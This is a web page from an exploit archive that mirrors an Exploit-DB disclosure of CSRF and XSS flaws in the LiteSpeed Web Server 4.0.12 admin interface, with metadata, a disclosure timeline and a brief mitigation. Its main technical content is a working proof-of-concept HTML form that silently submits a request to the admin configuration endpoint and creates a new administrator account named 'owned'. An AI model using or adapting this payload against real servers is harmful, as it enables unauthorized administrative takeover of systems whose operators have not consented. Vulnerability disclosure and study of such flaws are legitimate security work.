Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
LiteSpeed Web Server CSRF and XSS Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
LiteSpeed Web Server
by:
d1dn0t
5.5
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)
352
CWE
Product Name: LiteSpeed Web Server
Affected Version From: 4.0.12
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

LiteSpeed Web Server CSRF and XSS Vulnerabilities

The Web based HTTP Admin interface of LiteSpeed Web Server is vulnerable to a CSRF exploit that allows an attacker to add additional admin users. Additionally, the admin interface has XSS issues in the Notes field of the Virtual Server configuration.

Mitigation:

Update to the latest version of LiteSpeed Web Server that includes the vendor fix. Ensure that input validation and output encoding are implemented to prevent XSS attacks.
Source

Exploit-DB raw data:

# Author: d1dn0t (didnot[at]me[dot]com)
# Software Link:
http://www.litespeedtech.com/litespeed-web-server-downloads.html
# Version: 4.0.12
# Greetz: Muts/Ryujin/Kernel_Saunders

[ 0x00 ] Product Description

LiteSpeed Web Server is the leading high-performance, high-scalability web
server. It is completely Apache interchangeable so LiteSpeed Web Server
can quickly replace a major bottleneck in your existing web delivery
platform. With its comprehensive range of features and easy-to-use
web administration console, LiteSpeed Web Server can help you
conquer the challenges of deploying an effective web serving architecture.

[ 0x01 ] Vulnerability Details

The Web based HTTP Admin interface is vulnerable to a CSRF exploit to
add additional admin users.
The admin interface also has XSS issues in the Notes field of the
Virtual Server configuration.

[ 0x02 ] Vulnerability Timeline

2010-02-04 Discovery
2010-02-04 Initial Disclosure to Vendor
2010-02-04 Vendor Response, fix in progress
2010-02-18 Vendor Fix Released

[ 0x03 ] Vulnerability

<form name="csrf" action="http://192.168.1.10:7080/config/confMgr.php"
method="post" target="hidden">
<input type="hidden" name="a" value="s" />
<input type="hidden" name="m" value="admin" />
<input type="hidden" name="p" value="security" />
<input type="hidden" name="t" value="`ADMIN_USR_NEW" />
<input type="hidden" name="r" value="" />
<input type="hidden" name="file_create" value="" />
<input type="hidden" name="name" value="owned" />
<input type="hidden" name="pass" value="password" />
<input type="hidden" name="pass1" value="password" />
</form>

Navigation

Suggest Exploit

Services By CQR